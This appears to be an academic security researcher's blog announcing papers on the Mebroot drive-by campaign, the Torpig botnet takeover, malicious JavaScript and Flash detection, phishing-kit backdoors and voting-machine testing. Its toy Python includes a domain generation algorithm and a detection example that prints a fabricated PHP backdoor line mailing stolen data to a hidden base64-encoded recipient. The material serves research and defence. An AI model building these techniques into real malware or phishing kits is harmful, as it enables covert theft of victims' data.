June 22, 2011
We have recently presented our paper Peering through the iFrame at the INFOCOM mini-conference.
In this paper, we look in depth into a drive-by-download campaign, the one used to spread the Mebroot malware. In a way, this paper is an ideal continuation of our earlier investigations of the Mebroot/Torpig botnet; more generally, however, it aims to provide a snapshot (as comprehensive as possible) of a modern drive-by-download campaign. Mebroot is not the most pervasive or widespread drive-by-download campaign (during our monitoring, it affected "only" several thousand domains), but it is long-lasting and quite successful, and therefore it makes for an interesting subject of study.
We started off our study with the goal of gaining a better understanding of all the parties involved in a drive-by-download campaign: the attackers (what is their modus operandi? what infrastructure do they rely on for running the campaign?); the legitimate web sites that get compromised to drive traffic to exploit sites (which sites are targeted? do they notice they have been compromised? how long does it take for them to clean up?); and the final potential victims of the attacks (are they indeed vulnerable to the attacks? what is the actual infection rate?).
To answer these questions, we needed to get visibility into the operations of the drive-by-download campaign, and, as in our previous studies on Mebroot, we obtained it by infiltrating Mebroot's infrastructure. A little bit of background is necessary to understand how this worked in practice.
As in other drive-by-download attacks, the Mebroot campaign compromises legitimate web sites with code that redirects the visitors of these sites to the campaign's exploit sites (where the actual exploits are launched). In the Mebroot case, the injected code uses domain generation algorithms (DGAs) to dynamically generate the names of the exploit sites to which victims are sent (instead of having those names statically hard-coded). In practice, every so often (from one day to a few days), the DGAs generate a different domain name, thus redirecting victims to a different exploit site.
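To make the mechanism concrete, here is a minimal sketch of a date-seeded DGA. This illustrates the general technique only, not Mebroot's actual algorithm: the seed, hash, and TLD are all made up.

```python
import hashlib
from datetime import date, timedelta

def dga_domain(day: date, seed: str = "made-up-seed") -> str:
    """Derive the day's rendezvous domain from the date and a shared seed.

    The injected code and the attackers both compute this function, so
    they agree on the exploit site without hard-coding its name anywhere.
    """
    digest = hashlib.sha256(f"{seed}/{day.isoformat()}".encode()).hexdigest()
    # Map hex digits to letters to get a plausible-looking label.
    label = "".join(chr(ord("a") + int(c, 16) % 26) for c in digest[:12])
    return label + ".com"

# The domain changes with the date, so blocking today's exploit site
# only disrupts the campaign until the next domain rolls over.
for offset in range(3):
    print(dga_domain(date.today() + timedelta(days=offset)))
```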
This rotation is presumably done to make the campaign more resilient to take-down attempts: in the traditional model (hard-coded exploit sites), whenever the current exploit site is blocked, the campaign is effectively disabled, because all the legitimate web sites that an attacker has compromised suddenly become useless, as they point to a disabled domain.
In the Mebroot case, by contrast, the disruption caused by taking down the current exploit sites is only temporary: as soon as the DGAs generate a new exploit site, the campaign is active again, and the sites that were compromised in the past resume sending their victims to the new exploit site.
However, DGAs also open a window of opportunity for defenders. In particular, we were able to register some of the domain names that were to be used in the campaign. As a consequence, for several days over a period of almost a year, our own servers were used in the campaign in place of the actual exploit sites. Of course, our servers simply monitored the traffic they received and performed several measurements of their visitors.
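In other words, the infiltration follows directly from the predictability of the algorithm: anyone who knows (or has reverse engineered) the DGA can enumerate the upcoming domains and register the unclaimed ones first. Reusing the hypothetical dga_domain from the sketch above:

```python
from datetime import date, timedelta

def upcoming_domains(days_ahead: int) -> list[str]:
    """Enumerate the rendezvous domains the campaign will use next."""
    today = date.today()
    return [dga_domain(today + timedelta(days=d)) for d in range(1, days_ahead + 1)]

# Any of these names that is still unregistered can be claimed by a
# defender and pointed at a monitoring server instead of an exploit site.
for name in upcoming_domains(7):
    print(name)
```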
This monitoring gave us a lot of interesting information; for all the results, refer to the full paper. Here are two findings (on the final target of the attacks and on the compromised web sites) that I think are particularly interesting.
How vulnerable really are the users that are redirected to exploit sites? Quite a bit. During our study, we found that roughly between 60% and 80% of the visitors used at least one browser plugin that was known to be vulnerable. Between 30% and 40% of the users we observed were vulnerable to one of the exploits used in the Mebroot drive-by-download campaign. Clearly, these are very worrying statistics. To be precise, these are upper bounds on the actual infection rates: from our vantage point, we could not determine whether an exploit was successful (an attack could be blocked by a host-based defense mechanism, such as an anti-virus tool). In any case, the potential for infection (and the lack of updating and patching) is staggering.
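As a rough illustration of the kind of check involved, a monitoring server can compare the plugin versions reported by visitors against a table of known-vulnerable releases. The plugin names and version thresholds below are invented for the example; they are not the ones from the study.

```python
# Hypothetical example: match visitor-reported plugin versions against
# a table of "vulnerable if older than" releases. All data is made up.
VULNERABLE_BEFORE = {
    "flash": (10, 0, 22),
    "pdf-reader": (9, 1, 0),
}

def parse_version(text: str) -> tuple[int, ...]:
    return tuple(int(part) for part in text.split("."))

def is_vulnerable(plugin: str, version: str) -> bool:
    threshold = VULNERABLE_BEFORE.get(plugin)
    return threshold is not None and parse_version(version) < threshold

visitors = [
    {"flash": "9.0.115", "pdf-reader": "9.2.0"},
    {"flash": "10.1.53"},
]
at_risk = sum(
    any(is_vulnerable(p, v) for p, v in visitor.items()) for visitor in visitors
)
print(f"{at_risk}/{len(visitors)} visitors ran at least one vulnerable plugin")
```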
Switching our attention to the compromised web sites that expose their users to exploits: do they realize that they have been compromised, and, if so, do they clean up and remediate the infection? Not really. Almost 20% of the compromised web sites remained infected for our entire monitoring period. Those that did clean up did so very slowly: after 25 days, only half of the sites had removed the malicious code.
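The underlying measurement is a simple survival count over the monitoring window; a toy version, with made-up observations, might look like this:

```python
# Toy sketch: fraction of compromised sites still infected after N days,
# from per-site cleanup observations. A value of None means the site was
# never observed to clean up. All numbers here are made up.
cleanup_day = {"site-a": 3, "site-b": 40, "site-c": None, "site-d": 25}

def still_infected(day: int) -> float:
    infected = sum(1 for d in cleanup_day.values() if d is None or d > day)
    return infected / len(cleanup_day)

for day in (10, 25, 60):
    print(f"day {day}: {still_infected(day):.0%} of sites still infected")
```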
For more results, stats, and graphs, check out the paper. Here is the abstract:
Drive-by-download attacks have become the method of choice for cyber-criminals to infect machines with malware. Previous research has focused on developing techniques to detect web sites involved in drive-by-download attacks, and on measuring their prevalence by crawling large portions of the Internet. In this paper, we take a different approach to analyzing and understanding drive-by-download attacks. Instead of horizontally searching the Internet for malicious pages, we examine in depth one drive-by-download campaign, that is, the coordinated efforts used to spread malware. In particular, we focus on the Mebroot campaign, which we periodically monitored and infiltrated over several months, by hijacking parts of its infrastructure and obtaining network traces at an exploit server.
By studying the Mebroot drive-by-download campaign from the inside, we could obtain an in-depth and comprehensive view into the entire life-cycle of this campaign and the involved parties. More precisely, we could study the security posture of the victims of drive-by attacks (e.g., by measuring the prevalence of vulnerable software components and the effectiveness of software updating mechanisms), the characteristics of legitimate web sites infected during the campaign (e.g., the infection duration), and the modus operandi of the miscreants controlling the campaign.
April 14, 2011
Some time ago, the IEEE Security & Privacy magazine accepted our paper Analysis of a Botnet Takeover, a new version of our CCS paper on Torpig.
There are two main differences from older versions of this work. First, we removed some of the more academic parts and rewrote the text to make it more appealing to a general readership. Second, and more interestingly, we added an "Aftermath" section, where we look back at the Mebroot/Torpig botnet one year after the original take-over, in light of new data we have collected since then. The main conclusions of this updated look at Torpig, unfortunately, are that the botnet has evolved, becoming more sophisticated and arguably harder to take over, and that it has remained relatively stable in size.
Some asked if our research ended up helping the bad guys, for example, by revealing a weakness in their operations (the hijackability of their C&C system) and prompting them to fix it. The answer is no: the possibility of hijacking DGA-based botnets was proved beyond any doubt, roughly at the same time, by the Conficker Working Group, which successfully stalled Conficker by sinkholing the domains it relies on for rendezvous.
Another question we are often asked is whether it would have been possible to stop the botnet by using some kind of "kill switch" or "kill command". This has long been considered a non-starter in the security community due to its possible unintended consequences. The classic argument typically goes as follows: it is very hard to test the correct functionality of such a kill switch (if it exists) on all possible configurations of infected machines; therefore, the kill command may cause a crash on some configurations. What if the machines so affected happen to be performing some critical task (for example, controlling health equipment)? It is very likely that this stance will be revisited in light of the recent Coreflood takedown, in which a kill command was employed to neuter Coreflood bots.
The Coreflood takedown, and similar earlier actions, also suggests a possible answer to another common question: how can a botnet like this actually be taken down? The combination of sinkholing, active stopping, and legal action has so far given the most effective results. It remains to be seen whether concerns about unintended consequences, and about governments intervening on individuals' computers, will prevent more widespread use of this tactic.
We also added to the paper a fairly comprehensive discussion of the ethical and legal aspects of our research, both to clarify what we did and why and to help researchers in a similar position to ours. Yet again, I'm sure that the Coreflood takedown will spark new discussions on these topics.
Here is the paper abstract:
Botnets, networks of malware-infected machines that are controlled by an adversary, are the root cause of a large number of security problems on the Internet. A particularly sophisticated and insidious type of bot is Torpig, a malware program that is designed to harvest sensitive information (such as bank account and credit card data) from its victims. In this paper, we report on our efforts to take control of the Torpig botnet and study its operations for a period of ten days. During this time, we observed more than 180 thousand infections and recorded almost 70 GB of data that the bots collected. While botnets have been "hijacked" and studied previously, the Torpig botnet exhibits certain properties that make the analysis of the data particularly interesting. First, it is possible (with reasonable accuracy) to identify unique bot infections and relate that number to the more than 1.2 million IP addresses that contacted our command and control server. Second, the Torpig botnet is large, targets a variety of applications, and gathers a rich and diverse set of data from the infected victims. This data provides a new understanding of the type and amount of personal information that is stolen by botnets.
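One detail from the abstract, counting bot infections rather than IP addresses, is worth a toy illustration: DHCP churn makes one bot appear under many addresses, while NAT hides many bots behind one, so the analysis keys on a per-bot identifier instead. The log format and data below are invented for the example.

```python
# Toy illustration: unique IP addresses vs. unique bot identifiers.
# Records are (bot_id, ip) pairs as a C&C server might log them.
records = [
    ("bot-1", "198.51.100.7"),
    ("bot-1", "198.51.100.93"),   # same bot after a new DHCP lease
    ("bot-1", "198.51.100.120"),  # and again
    ("bot-2", "203.0.113.5"),
    ("bot-3", "203.0.113.5"),     # two bots behind the same NAT
]

print("unique IPs: ", len({ip for _, ip in records}))    # over-counts
print("unique bots:", len({bot for bot, _ in records}))  # actual infections
```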
April 28, 2010
Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.
Here is the abstract:
JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.
This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.
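The anomaly-detection idea at the core of the approach can be shown with a toy numeric sketch: learn per-feature statistics from benign scripts, then flag scripts whose features deviate sharply. The features and numbers below are invented; the actual system uses a much richer feature set derived from emulation.

```python
import statistics

# Toy sketch of anomaly detection: learn per-feature statistics from
# benign samples, then score new samples by how far they deviate.
# Feature names and values are invented for illustration.
benign = [
    {"max_string_len": 120, "eval_calls": 0},
    {"max_string_len": 300, "eval_calls": 1},
    {"max_string_len": 80,  "eval_calls": 0},
]

profile = {
    feature: (
        statistics.mean(s[feature] for s in benign),
        statistics.pstdev(s[feature] for s in benign),
    )
    for feature in benign[0]
}

def anomaly_score(sample: dict) -> float:
    """Sum of z-scores across features; high values are suspicious."""
    score = 0.0
    for feature, (mean, std) in profile.items():
        score += abs(sample[feature] - mean) / (std or 1.0)
    return score

# A heavily obfuscated script: one huge string and many eval() calls.
print(anomaly_score({"max_string_len": 60000, "eval_calls": 40}))
```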
See you in Raleigh!
December 10, 2009
Today, Sean Ford is going to present our paper Analyzing and Detecting Malicious Flash Advertisements at the ACSAC Conference.
The paper describes some of the techniques we use to detect malicious Flash files. More precisely, we focused on two main threats:
First, Flash-based malvertisements that automatically redirect victims to malicious or questionable pages. This type of malware essentially exploits a design flaw in the current advertisement technology: the Flash language and its runtime, as implemented in today's browsers, are too powerful and too unrestricted. To put it more plainly, why should an advertisement be able to hijack the browser?
A possible solution here (which we do not explore in the paper) would be to identify a secure subset of Flash and restrict Flash-based advertisements to this subset. Of course, similar work has already been done in the JavaScript camp (see ADSafe or Caja, for example), so many lessons could probably be reused.
Second, malformed Flash files that exploit vulnerabilities in common Flash players, typically Adobe's. This type of malware exploits classic implementation problems (buffer overflows, integer overflows, etc.).
The paper also describes in some detail a number of techniques that malicious Flash files use to evade detection (trigger-based behavior, timezone checks, etc.) and to obfuscate the malicious code.
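One generic countermeasure against trigger-based evasion, sketched below in toy form, is to run the same sample under several simulated environments and flag samples whose behavior depends on the environment. The stand-in sample below is pure Python; an actual analyzer would of course drive a Flash emulator.

```python
import itertools

# Conceptual sketch of countering trigger-based evasion: run the same
# sample under several simulated environments and flag it if its
# observed behavior varies. `toy_sample` is a pure-Python stand-in for
# emulating a real Flash sample.
def toy_sample(env: dict) -> frozenset:
    # Misbehaves only in one timezone, mimicking a timezone-check trigger.
    if env["timezone"] == "EST":
        return frozenset({"redirect:evil.example"})
    return frozenset()

def divergent_behavior(run) -> bool:
    environments = [
        {"timezone": tz, "date": day}
        for tz, day in itertools.product(("UTC", "EST"), ("2009-12-01", "2010-01-15"))
    ]
    behaviors = {run(env) for env in environments}
    return len(behaviors) > 1  # behavior varies with the environment: suspicious

print(divergent_behavior(toy_sample))  # True
```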
Here is the abstract:
The amount of dynamic content on the web has been steadily increasing, and sites now offer user experiences that come close to those found when running local native applications. Advanced scripting languages such as JavaScript and Adobe's Flash have been instrumental in delivering dynamic content on the Internet. Dynamic content has also become popular in advertising, where Flash has achieved success allowing the creation of rich, interactive ads that are displayed on hundreds of millions of computers per day. The success of Flash-based applications and advertisements attracted the attention of malware authors who use Flash to deliver attacks through advertising networks. This paper presents a novel approach whose goal is to automate the analysis of Flash content to identify malicious behavior. We designed and implemented a tool based on the approach, we made it available to the world, and we tested it on a large corpus of real-world Flash ads. The results show that our tool is able to reliably detect malicious Flash ads with very limited false positives.
July 27, 2008
Tomorrow, I'm going to present our paper There is No Free Phish: An Analysis of "Free" and Live Phishing Kits at the USENIX WOOT Workshop. The paper talks about phishing kits, which are phishing sites in a ready-to-deploy package. We collected a large number of these kits, both from sites distributing them and from live phishing web servers. We found that phishing kits really are a double-edged sword: on one hand, phishers use them to get confidential information from unsuspecting victims; on the other hand, more experienced attackers plant backdoors in these kits, through which they covertly receive the information phished by the kits' users.
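As an illustration of how such a backdoor can be spotted (the kit snippet and addresses below are fabricated for the example), a crude scan can decode base64 literals in the kit's source and look for hidden e-mail addresses alongside the configured drop address:

```python
import base64
import re

# Toy illustration: phishing kits sometimes hide a second, obfuscated
# recipient (the kit author's backdoor). Scan the source for base64
# literals that decode to e-mail addresses. The snippet is made up.
kit_source = '''
$to = $_POST['drop_email'];
mail($to, "logs", $data);
mail(base64_decode("YXV0aG9yQGV4YW1wbGUuY29t"), "logs", $data);
'''

EMAIL = re.compile(rb"[\w.+-]+@[\w.-]+\.[a-z]{2,}")

for match in re.finditer(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', kit_source):
    decoded = base64.b64decode(match.group(1))
    if EMAIL.search(decoded):
        print("possible backdoor recipient:", decoded.decode())
```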
Here is the abstract:
Phishing is a form of identity theft in which an attacker attempts to elicit confidential information from unsuspecting victims. While in the past there has been significant work on defending from phishing, much less is known about the tools and techniques used by attackers, i.e., phishers. Of particular importance to understanding the phishers' methods and motivations are phishing kits, packages that contain complete phishing web sites in an easy-to-deploy format. In this paper, we study in detail the kits distributed for free in underground circles and those obtained by crawling live phishing sites. We notice that phishing kits often contain backdoors that send the entered information to third parties. We conclude that phishing kits target two classes of victims: the gullible users from whom they extort valuable information and the inexperienced phishers who deploy them.
After WOOT, I'm going to attend USENIX Security.
See you in San Jose!
July 21, 2008
Tomorrow, the International Symposium on Software Testing and Analysis (ISSTA) starts in Seattle. It is one of the main venues for research on testing and software analysis.
This year, we have a paper there. It is Are Your Votes Really Counted? Testing the Security of Real-world Electronic Voting Systems and it is joint work with quite a few people in the Computer Security Lab (Davide Balzarotti, Greg Banks, myself, Viktoria Felmetsger, Richard Kemmerer, William Robertson, Fredrik Valeur, and Giovanni Vigna). The paper is the result of our experience with the California Top-To-Bottom Review of electronic voting machines and the similar EVEREST project in Ohio. We describe the methodology we used to perform red-team testing of two real-world electronic voting systems (one produced by Sequoia, the other by ES&S), the tools and techniques we developed, some of the vulnerabilities we identified (spoiler: we designed and implemented malicious code capable of spreading from machine to machine in both cases), and the lessons we learned in the process.
Here is the abstract:
Electronic voting systems play a critical role in today's democratic societies, as they are responsible for recording and counting the citizens' votes. Unfortunately, there is an alarming number of reports describing the malfunctioning of these systems, suggesting that their quality is not up to the task. Recently, there has been a focus on the security testing of voting systems to determine if they can be compromised in order to control the results of an election. We have participated in two large-scale projects, sponsored by the Secretaries of State of California and Ohio, whose respective goals were to perform the security testing of the electronic voting systems used in those two states. The testing process identified major flaws in all the systems analyzed, and resulted in substantial changes in the voting procedures of both states. In this paper, we describe the testing methodology that we used in testing two real-world electronic voting systems, the findings of our analysis, and the lessons we learned.
If you are attending the conference, see you in Seattle!